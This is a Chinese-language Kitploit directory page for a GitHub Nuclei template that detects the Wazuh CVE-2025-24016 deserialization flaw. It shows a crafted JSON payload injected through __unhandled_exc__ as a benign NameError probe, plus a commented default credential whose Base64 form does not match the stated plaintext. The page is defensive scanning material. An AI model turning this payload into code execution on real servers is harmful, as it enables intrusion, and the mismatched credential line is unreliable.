Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-24016-Nuclei-Template — Nuclei 模板,用于检测 Wazuh 服务器中 CVE-2025-24016 不安全反序列化 RCE,该漏洞通过精心构造的 JSON 载荷触发 NameError。 | Kitploit
工具/GitHubGitHub/huseyinstif/cve-2025-24016-nuclei-template
漏洞扫描器代码分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubhuseyinstif/cve-2025-24016-nuclei-template

CVE-2025-24016-Nuclei-Template

Nuclei 模板,用于检测 Wazuh 服务器中 CVE-2025-24016 不安全反序列化 RCE,该漏洞通过精心构造的 JSON 载荷触发 NameError。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
4181年前尚未审核
分享

CVE-2025-24016 Wazuh 不安全反序列化 RCE 检测

本仓库包含一个 Nuclei 模板,用于检测 Wazuh 服务器中标识为 CVE-2025-24016 的不安全反序列化漏洞。

模板详情

id: wazuh-unsafe-deserialization
info:
  name: "Wazuh Unsafe Deserialization RCE Detection"
  author: "Hüseyin TINTAŞ"
  severity: critical
  description: |
    This template detects an unsafe deserialization vulnerability in Wazuh servers.
    The DistributedAPI deserializes JSON data using as_wazuh_object. If an attacker injects
    a malicious object (via __unhandled_exc__), arbitrary Python code execution can be achieved.
    Instead of triggering a shutdown (e.g. via exit), this template uses a non-existent class 
    ("NotARealClass") to generate a NameError. A NameError in the response indicates that the 
    payload reached the vulnerable deserialization function.
  tags: wazuh, deserialization, rce, unsafe, cve, cve-2025-24016
  reference:
    - https://documentation.wazuh.com/
requests:
  - method: POST
    path:
      - "{{BaseURL}}/security/user/authenticate/run_as"
    headers:
      Content-Type: application/json
      # If needed, uncomment the following line for authentication (Base64 encoded "wazuh-wui:MyS3cr37P450r.*-")
      # Authorization: "Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg=="
    body: '{"__unhandled_exc__":{"__class__": "NotARealClass", "__args__": []}}'
    matchers:
      - type: status
        status:
          - 500
      - type: word
        part: body
        words:
          - "NameError"

使用方法

nuclei -t CVE-2025-24016.yaml -u http://example.com

联系方式

如有任何疑问或需要更多信息,您可以通过以下方式联系我:

  • LinkedIn
  • Twitter
下载工具